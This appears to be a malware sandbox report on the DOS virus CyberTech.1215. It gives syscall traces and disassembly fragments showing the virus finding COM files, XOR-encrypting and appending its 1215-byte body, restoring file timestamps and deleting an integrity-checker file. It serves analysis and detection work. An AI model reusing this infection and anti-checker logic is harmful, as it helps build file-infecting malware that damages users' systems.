Sample viewer

vx.netlux.org/Virus.DOS.CyberTech.1215

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:49:16.193583034Z	48	PC: 12a98 \| Get DOS version
2018-12-17T22:49:16.195342429Z	42	PC: 12aa3 \| Get date 0x12aa3: cmp cx, 0x7ca 0x12aa7: jae 0x12aac 0x12aa9: jmp 0x12b59 0x12aac: mov ah, 0x1a 0x12aae: mov dx, 0xfd00 0x12ab1: int 0x21 0x12ab3: mov ax, word ptr cs:[0x2c] 0x12ab7: mov ds, ax 0x12ab9: mov si, 0 0x12abc: mov cx, 0x4000 0x12abf: lodsb al, byte ptr [si] 0x12ac0: cmp al, 1 0x12ac2: je 0x12ac6 0x12ac4: loop 0x12abf 0x12ac6: inc si 0x12ac7: push cs 0x12ac8: pop es 0x12ac9: mov di, 0xfd80 0x12acc: mov cx, 0x80 0x12acf: lodsb al, byte ptr [si]
2018-12-17T22:49:16.198713654Z	26	PC: 12ab3 \| Set disk transfer address
2018-12-17T22:49:16.20038821Z	67	PC: 12b01 \| Get or set file attributes
2018-12-17T22:49:16.206933417Z	67	PC: 12b0e \| Get or set file attributes
2018-12-17T22:49:16.24270729Z	61	PC: 12b13 \| Open file (Filename = 'A:\TEST.COM')
2018-12-17T22:49:16.250755181Z	87	PC: 12b1a \| Get or set file date and time
2018-12-17T22:49:16.253039653Z	62	PC: 12b20 \| Close file
2018-12-17T22:49:16.256387283Z	60	PC: 12b29 \| Create or truncate file
2018-12-17T22:49:16.270688733Z	64	PC: 12b38 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:49:16.274730306Z	87	PC: 12b3f \| Get or set file date and time
2018-12-17T22:49:16.276492738Z	62	PC: 12b43 \| Close file
2018-12-17T22:49:16.294365949Z	67	PC: 12b4c \| Get or set file attributes
2018-12-17T22:49:16.307110804Z	9	PC: 12b56 \| Display string (Could not find end pointer)
2018-12-17T22:49:16.330177673Z	26	PC: 12d02 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9836,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:53.87548419Z	48	PC: 12a98 \| Get DOS version
2018-12-25T12:23:53.877425675Z	42	PC: 12aa3 \| Get date 0x12aa3: cmp cx, 0x7ca 0x12aa7: jae 0x12aac 0x12aa9: jmp 0x12b59 0x12aac: mov ah, 0x1a 0x12aae: mov dx, 0xfd00 0x12ab1: int 0x21 0x12ab3: mov ax, word ptr cs:[0x2c] 0x12ab7: mov ds, ax 0x12ab9: mov si, 0 0x12abc: mov cx, 0x4000 0x12abf: lodsb al, byte ptr [si] 0x12ac0: cmp al, 1 0x12ac2: je 0x12ac6 0x12ac4: loop 0x12abf 0x12ac6: inc si 0x12ac7: push cs 0x12ac8: pop es 0x12ac9: mov di, 0xfd80 0x12acc: mov cx, 0x80 0x12acf: lodsb al, byte ptr [si]
2018-12-25T12:23:53.879892921Z	26	PC: 12b60 \| Set disk transfer address
2018-12-25T12:23:53.881207368Z	78	PC: 12b6a \| Find first file
2018-12-25T12:23:53.887577102Z	67	PC: 12b77 \| Get or set file attributes
2018-12-25T12:23:53.893641029Z	67	PC: 12b7f \| Get or set file attributes
2018-12-25T12:23:53.910370478Z	61	PC: 12b84 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:53.922207007Z	87	PC: 12b8a \| Get or set file date and time
2018-12-25T12:23:53.924507555Z	63	PC: 12b97 \| Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:23:53.93160526Z	66	PC: 12bbd \| Move file pointer
2018-12-25T12:23:53.933159737Z	66	PC: 12c5c \| Move file pointer
2018-12-25T12:23:53.935203955Z	63	PC: 12c66 \| Read file or device (Read 52 bytes on handle 5)
2018-12-25T12:23:53.938243011Z	66	PC: 12bbd \| Move file pointer (See above)
2018-12-25T12:23:53.940130591Z	44	PC: 12cb3 \| Get time 0x12cb3: cmp dl, 0 0x12cb6: jne 0x12cc2 0x12cb8: mov ah, 9 0x12cba: lea dx, word ptr [bp + 0x464] 0x12cbe: int 0x21 0x12cc0: jmp 0x12caf 0x12cc2: mov byte ptr cs:[bp + 0x17], dl 0x12cc6: lea si, word ptr [bp + 4] 0x12cc9: mov di, 0xfb00 0x12ccc: mov cx, 0x17 0x12ccf: rep movsb byte ptr es:[di], byte ptr [si] 0x12cd1: lea si, word ptr [bp + 0x1b] 0x12cd4: mov cx, 0x4a8 0x12cd7: lodsb al, byte ptr [si] 0x12cd8: xor al, dl 0x12cda: stosb byte ptr es:[di], al 0x12cdb: loop 0x12cd7 0x12cdd: mov ah, 0x40 0x12cdf: mov dx, 0xfb00 0x12ce2: mov cx, 0x4bf
2018-12-25T12:23:53.943464369Z	64	PC: 12ce7 \| Write file or device (Write 1215 bytes on handle 5)
2018-12-25T12:23:53.952973075Z	66	PC: 12bbd \| Move file pointer (See above)
2018-12-25T12:23:53.954494575Z	64	PC: 12cf8 \| Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:23:53.963066041Z	87	PC: 12d28 \| Get or set file date and time
2018-12-25T12:23:53.965165404Z	62	PC: 12d2c \| Close file
2018-12-25T12:23:53.975371939Z	67	PC: 12d35 \| Get or set file attributes
2018-12-25T12:23:53.981262126Z	65	PC: 12d3d \| Delete file (Filename = 'chklist.cps')
2018-12-25T12:23:53.988776045Z	26	PC: 12d02 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9836,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:54.030096705Z	48	PC: 12a98 \| Get DOS version
2018-12-25T12:23:54.031783178Z	42	PC: 12aa3 \| Get date 0x12aa3: cmp cx, 0x7ca 0x12aa7: jae 0x12aac 0x12aa9: jmp 0x12b59 0x12aac: mov ah, 0x1a 0x12aae: mov dx, 0xfd00 0x12ab1: int 0x21 0x12ab3: mov ax, word ptr cs:[0x2c] 0x12ab7: mov ds, ax 0x12ab9: mov si, 0 0x12abc: mov cx, 0x4000 0x12abf: lodsb al, byte ptr [si] 0x12ac0: cmp al, 1 0x12ac2: je 0x12ac6 0x12ac4: loop 0x12abf 0x12ac6: inc si 0x12ac7: push cs 0x12ac8: pop es 0x12ac9: mov di, 0xfd80 0x12acc: mov cx, 0x80 0x12acf: lodsb al, byte ptr [si]
2018-12-25T12:23:54.035590968Z	26	PC: 12ab3 \| Set disk transfer address
2018-12-25T12:23:54.037640753Z	67	PC: 12b01 \| Get or set file attributes
2018-12-25T12:23:54.044424304Z	67	PC: 12b0e \| Get or set file attributes
2018-12-25T12:23:54.061291158Z	61	PC: 12b13 \| Open file (Filename = 'A:\TEST.COM')
2018-12-25T12:23:54.076704711Z	87	PC: 12b1a \| Get or set file date and time
2018-12-25T12:23:54.07801321Z	62	PC: 12b20 \| Close file
2018-12-25T12:23:54.08025911Z	60	PC: 12b29 \| Create or truncate file
2018-12-25T12:23:54.096672547Z	64	PC: 12b38 \| Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:23:54.100379281Z	87	PC: 12b3f \| Get or set file date and time
2018-12-25T12:23:54.101857549Z	62	PC: 12b43 \| Close file
2018-12-25T12:23:54.111374335Z	67	PC: 12b4c \| Get or set file attributes
2018-12-25T12:23:54.122143078Z	9	PC: 12b56 \| Display string (Could not find end pointer)
2018-12-25T12:23:54.145646114Z	26	PC: 12d02 \| Set disk transfer address